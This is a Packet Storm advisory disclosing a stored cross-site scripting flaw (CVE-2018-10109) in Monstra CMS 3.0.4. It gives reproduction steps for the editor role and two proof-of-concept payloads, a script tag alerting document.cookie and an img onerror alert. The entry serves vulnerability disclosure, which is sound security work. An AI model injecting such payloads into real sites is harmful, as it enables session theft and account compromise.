Monstra CMS 3.0.4 Cross Site Scripting

2018-04-23T00:00:00
ID PACKETSTORM:147296
Type packetstorm
Reporter Wenming Jiang
Modified 2018-04-23T00:00:00

Description

                                        
`# Exploit Title: Monstra cms 3.0.4 - Persistent Cross-Site Scripting  
# Date: 2018-04-14  
# Exploit Author: Wenming Jiang  
# Vendor Homepage: https://github.com/monstra-cms/monstra  
# Software Link: https://github.com/monstra-cms/monstra  
# Version: 3.0.4  
# Tested on: php 5.6, apache2.2.29, macos 10.12.6  
# CVE: CVE-2018-10109  
  
  
#Description:  
#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload  
#in the content section of a new page in the blog catalog.  
  
  
#Steps to replicate:  
#1. log into the system as an editor role  
#2. create a new page in the blog catalog  
#3. navigate to content section  
#4. enter payload: <script>alert(document.cookie)</script>  
#5. visit http://<your_site>/monstra/blog/<page_name>.php, you will trigger JavaScript execution  
  
  
  
#Exploit Code:  
<script>alert(document.cookie)</script>  
or  
<img src=1 onerror=alert(/xss/) >  
  
`